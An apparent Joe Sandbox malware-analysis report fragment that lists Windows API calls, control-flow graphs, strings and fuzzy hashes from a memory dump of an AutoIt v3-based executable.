                                                                                                                                                                              • Opcode Fuzzy Hash: 2f4b3bd4f4a71323c9ff9e18bdfadf59163b84e8484a5fea6cedd72d1eeb041f
                                                                                                                                                                              • Instruction Fuzzy Hash: 69B26C74A08341CFDB24CF18C490A6ABBE1FF99300F58895DE98A9B351D771ED45CBA2

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DA32AF
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DA32B7
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DA32C2
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DA32CD
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DA32D5
                                                                                                                                                                                • Part of subcall function 00DA327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DA32DD
                                                                                                                                                                                • Part of subcall function 00DA3205: RegisterWindowMessageW.USER32(00000004,?,00DA2964), ref: 00DA325D
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DA2A0A
                                                                                                                                                                              • OleInitialize.OLE32 ref: 00DA2A28
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00DE3A0D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                              • String ID: (&$0$$4'$d($$
                                                                                                                                                                              • API String ID: 1986988660-3144845333
                                                                                                                                                                              • Opcode ID: dd382c58e6afbe244c2e3164fa78bdaf50991bfc80d4855bfa8bdfc664896923
                                                                                                                                                                              • Instruction ID: e3a0ee565f4e7436626c6320eaa4bfae177fd6def8c2432e08acdc6fba6272a9
                                                                                                                                                                              • Opcode Fuzzy Hash: dd382c58e6afbe244c2e3164fa78bdaf50991bfc80d4855bfa8bdfc664896923
                                                                                                                                                                              • Instruction Fuzzy Hash: 5771AEB09012018F9788DF7BAD6A6153AF1FB89300B44912EE21CF7262EB7144C9CF66

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1872 dd90c5-dd90d5 1873 dd90ef-dd90f1 1872->1873 1874 dd90d7-dd90ea call dcf636 call dcf649 1872->1874 1875 dd9459-dd9466 call dcf636 call dcf649 1873->1875 1876 dd90f7-dd90fd 1873->1876 1892 dd9471 1874->1892 1893 dd946c call dd2b5c 1875->1893 1876->1875 1878 dd9103-dd912e 1876->1878 1878->1875 1881 dd9134-dd913d 1878->1881 1884 dd913f-dd9152 call dcf636 call dcf649 1881->1884 1885 dd9157-dd9159 1881->1885 1884->1893 1890 dd915f-dd9163 1885->1890 1891 dd9455-dd9457 1885->1891 1890->1891 1896 dd9169-dd916d 1890->1896 1894 dd9474-dd9479 1891->1894 1892->1894 1893->1892 1896->1884 1899 dd916f-dd9186 1896->1899 1901 dd9188-dd918b 1899->1901 1902 dd91a3-dd91ac 1899->1902 1905 dd918d-dd9193 1901->1905 1906 dd9195-dd919e 1901->1906 1903 dd91ae-dd91c5 call dcf636 call dcf649 call dd2b5c 1902->1903 1904 dd91ca-dd91d4 1902->1904 1935 dd938c 1903->1935 1908 dd91db-dd91dc call dd3b93 1904->1908 1909 dd91d6-dd91d8 1904->1909 1905->1903 1905->1906 1910 dd923f-dd9259 1906->1910 1918 dd91e1-dd91f9 call dd2d38 * 2 1908->1918 1909->1908 1912 dd932d-dd9336 call ddfc1b 1910->1912 1913 dd925f-dd926f 1910->1913 1924 dd93a9 1912->1924 1925 dd9338-dd934a 1912->1925 1913->1912 1917 dd9275-dd9277 1913->1917 1917->1912 1921 dd927d-dd92a3 1917->1921 1939 dd91fb-dd9211 call dcf649 call dcf636 1918->1939 1940 dd9216-dd923c call dd97a4 1918->1940 1921->1912 1926 dd92a9-dd92bc 1921->1926 1928 dd93ad-dd93c5 ReadFile 1924->1928 1925->1924 1930 dd934c-dd935b GetConsoleMode 1925->1930 1926->1912 1931 dd92be-dd92c0 1926->1931 1933 dd93c7-dd93cd 1928->1933 1934 dd9421-dd942c GetLastError 1928->1934 1930->1924 1936 dd935d-dd9361 1930->1936 1931->1912 1937 dd92c2-dd92ed 1931->1937 1933->1934 1943 dd93cf 1933->1943 1941 dd942e-dd9440 call dcf649 call dcf636 1934->1941 1942 dd9445-dd9448 1934->1942 1945 dd938f-dd9399 call dd2d38 1935->1945 1936->1928 1944 dd9363-dd937d ReadConsoleW 1936->1944 1937->1912 1946 dd92ef-dd9302 1937->1946 1939->1935 1940->1910 1941->1935 1954 dd944e-dd9450 1942->1954 1955 dd9385-dd938b call dcf613 1942->1955 1951 dd93d2-dd93e4 1943->1951 1952 dd937f GetLastError 1944->1952 1953 dd939e-dd93a7 1944->1953 1945->1894 1946->1912 1947 dd9304-dd9306 1946->1947 1947->1912 1958 dd9308-dd9328 1947->1958 1951->1945 1962 dd93e6-dd93ea 1951->1962 1952->1955 1953->1951 1954->1945 1955->1935 1958->1912 1966 dd93ec-dd93fc call dd8de1 1962->1966 1967 dd9403-dd940e 1962->1967 1978 dd93ff-dd9401 1966->1978 1972 dd941a-dd941f call dd8c21 1967->1972 1973 dd9410 call dd8f31 1967->1973 1979 dd9415-dd9418 1972->1979 1973->1979 1978->1945 1979->1978
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 03b3779b8f4ea4da9106f96532f0283672cac7b1d7df2e474988a13f0d548cd6
                                                                                                                                                                              • Instruction ID: 6081c090b6240d2e1b8b80267b2c05785671d6c4ea70ed61ba69f6e8cefea1de
                                                                                                                                                                              • Opcode Fuzzy Hash: 03b3779b8f4ea4da9106f96532f0283672cac7b1d7df2e474988a13f0d548cd6
                                                                                                                                                                              • Instruction Fuzzy Hash: 65C1EF70A0434AAFCF11DFE9D851BADFBB1AF09310F18419AE454AB392C7329946CB71

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2016 da35b3-da3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DA35E1
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DA3602
                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA3368,?), ref: 00DA3616
                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA3368,?), ref: 00DA361F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                              • Opcode ID: 96c2d2bc77b3d12aaf0792376eaad274a68f02a3baf92c165af19769e68a8bbb
                                                                                                                                                                              • Instruction ID: 0220d8eab157aedcd1298c424b353dc6385b81569e2cda282130f8dc16dec2b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 96c2d2bc77b3d12aaf0792376eaad274a68f02a3baf92c165af19769e68a8bbb
                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF0DA716443967EE73197277C0DE3B2EBDD7C6F50F01001EBA08B7160D6A91899EAB0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DE5287
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DA6299
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                              • String ID: Line %d: $AutoIt - $\+
                                                                                                                                                                              • API String ID: 2289894680-1638154863
                                                                                                                                                                              • Opcode ID: c99b8efa814266c7fbabf096611f593d50e16f83e812bda11ea86ff401705a61
                                                                                                                                                                              • Instruction ID: 8846c3d6d2f543f164109d3ae29cafb7112b5eb2f217f27ba044117abb2b83ea
                                                                                                                                                                              • Opcode Fuzzy Hash: c99b8efa814266c7fbabf096611f593d50e16f83e812bda11ea86ff401705a61
                                                                                                                                                                              • Instruction Fuzzy Hash: F4419471408305AEC710EB61EC45BDF7BD8EF55320F08452EF599A20A2EB74D689C7B6

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2068 da58cb-da58d6 2069 da5948-da594a 2068->2069 2070 da58d8-da58dd 2068->2070 2071 da593b-da593e 2069->2071 2070->2069 2072 da58df-da58f7 RegOpenKeyExW 2070->2072 2072->2069 2073 da58f9-da5918 RegQueryValueExW 2072->2073 2074 da591a-da5925 2073->2074 2075 da592f-da593a RegCloseKey 2073->2075 2076 da593f-da5946 2074->2076 2077 da5927-da5929 2074->2077 2075->2071 2078 da592d 2076->2078 2077->2078 2078->2075
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00DA58BE,SwapMouseButtons,00000004,?), ref: 00DA58EF
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00DA58BE,SwapMouseButtons,00000004,?), ref: 00DA5910
                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00DA58BE,SwapMouseButtons,00000004,?), ref: 00DA5932
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                                                                              • Opcode ID: e814326beea87196e7113a5215b2da0b9509239c326d8779ce9b8f07301c691d
                                                                                                                                                                              • Instruction ID: d64a685c1b150cd30f6ae1a51571b6e2ca0e798c716e61af8038a43ebcac7cfa
                                                                                                                                                                              • Opcode Fuzzy Hash: e814326beea87196e7113a5215b2da0b9509239c326d8779ce9b8f07301c691d
                                                                                                                                                                              • Instruction Fuzzy Hash: DE115775610618FFDB218F65EC84AAFBBB9EF02760F108429F805EB214E2319E459B60
                                                                                                                                                                              APIs
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00DAF27B
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00DAF289
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DAF29F
                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00DAF2B1
                                                                                                                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00DF32D8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 3288985973-2063206799
                                                                                                                                                                              • Opcode ID: 94ec568bfd21df8e59cd6b73fa12eb976992c81be97d588df89082a9da3e61f0
                                                                                                                                                                              • Instruction ID: 23b46025c49f631a30d622afcc5dbf0108ec7587f623f709b7baabafb3da500a
                                                                                                                                                                              • Opcode Fuzzy Hash: 94ec568bfd21df8e59cd6b73fa12eb976992c81be97d588df89082a9da3e61f0
                                                                                                                                                                              • Instruction Fuzzy Hash: CBF030306043499AE73087A19C49FEA77A8EB85300F144919E349D30C0DB3095888B36
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00DB3006
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: CALL$bn
                                                                                                                                                                              • API String ID: 1385522511-1920074456
                                                                                                                                                                              • Opcode ID: ad5da5a348d8b4baa651572b60fcc14b801a505d537bcad5bd45c299a609df4f
                                                                                                                                                                              • Instruction ID: f8dacb18d8797e8d1baafc425008f3cdb4a052df60db7f1a1bd77c14e9e76477
                                                                                                                                                                              • Opcode Fuzzy Hash: ad5da5a348d8b4baa651572b60fcc14b801a505d537bcad5bd45c299a609df4f
                                                                                                                                                                              • Instruction Fuzzy Hash: 77226871608201DFC714DF24C880ABABBF1FF89314F18895DF59A9B2A1D771E945CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00DE413B
                                                                                                                                                                                • Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
                                                                                                                                                                                • Part of subcall function 00DA3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00DA3A76
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                              • String ID: X$`u
                                                                                                                                                                              • API String ID: 779396738-2693526198
                                                                                                                                                                              • Opcode ID: 21eab989a1b3d87a44bbd420829b81e900139820a8d0f44dd85c68289fe92f71
                                                                                                                                                                              • Instruction ID: d4203c73d41f559ed9c64a3a7404ed442fc3e921e90a9b48ec0ca1993cf39540
                                                                                                                                                                              • Opcode Fuzzy Hash: 21eab989a1b3d87a44bbd420829b81e900139820a8d0f44dd85c68289fe92f71
                                                                                                                                                                              • Instruction Fuzzy Hash: 64218E71A042989BDB01DF94D809BEE7BF9EF49304F008059F545BB241DBB89A898FB1
                                                                                                                                                                              APIs
                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00DC09D8
                                                                                                                                                                                • Part of subcall function 00DC3614: RaiseException.KERNEL32(?,?,?,00DC09FA,?,00000000,?,?,?,?,?,?,00DC09FA,00000000,00E69758,00000000), ref: 00DC3674
                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00DC09F5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                                              • Opcode ID: 621285ca53ca4c780596ddf87d16907b46325f30e73d1e07c54bbe9968d9f0f5
                                                                                                                                                                              • Instruction ID: d8eb35d40054c7838f1816346700dfdb41dc11b810ed55d2571a09e2d2fde8da
                                                                                                                                                                              • Opcode Fuzzy Hash: 621285ca53ca4c780596ddf87d16907b46325f30e73d1e07c54bbe9968d9f0f5
                                                                                                                                                                              • Instruction Fuzzy Hash: CEF0443494030FF78F00BAA4E846F9ABB6C9A00754B588129B915E7592EF70EA558AF0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00E28D52
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00E28D59
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00E28F3A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 146820519-0
                                                                                                                                                                              • Opcode ID: 0682edf0f29cacb7853de2fd968598b118246c7ffa675e1be387b5aa62c899a4
                                                                                                                                                                              • Instruction ID: 06f0c16d8c37694873e1ce44e6070addba36b5f322bf519e0050e4d739cb1ade
                                                                                                                                                                              • Opcode Fuzzy Hash: 0682edf0f29cacb7853de2fd968598b118246c7ffa675e1be387b5aa62c899a4
                                                                                                                                                                              • Instruction Fuzzy Hash: 65128C71A08310DFD714CF28C584B6ABBE5FF89318F04995DE889AB252CB30ED45CB92
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$_strcat
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 306214811-0
                                                                                                                                                                              • Opcode ID: 43ff1c9919307c20f369ddcea1395dbe3e8c4534876518922cb9f6b25c2f4fde
                                                                                                                                                                              • Instruction ID: 0e3085f161a651e0f44e018ee9938b1a181ff84f30583dc619fade18a220363f
                                                                                                                                                                              • Opcode Fuzzy Hash: 43ff1c9919307c20f369ddcea1395dbe3e8c4534876518922cb9f6b25c2f4fde
                                                                                                                                                                              • Instruction Fuzzy Hash: 86A15B31600515DFCB18DF18D5D29A9BBE1FF45314B60A4AEE84A9F292DB31ED42CF90
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DA6299
                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00DBFD36
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DBFD45
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DFFE33
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3500052701-0
                                                                                                                                                                              • Opcode ID: 0380846cd7dccc1981e26396a11bb7b47fbf2d265dd688b0b2fba16ce313e8b7
                                                                                                                                                                              • Instruction ID: ac9d88573053eb7fceb221014a001753dff3b60dc41b1f187f600bf5c8264eee
                                                                                                                                                                              • Opcode Fuzzy Hash: 0380846cd7dccc1981e26396a11bb7b47fbf2d265dd688b0b2fba16ce313e8b7
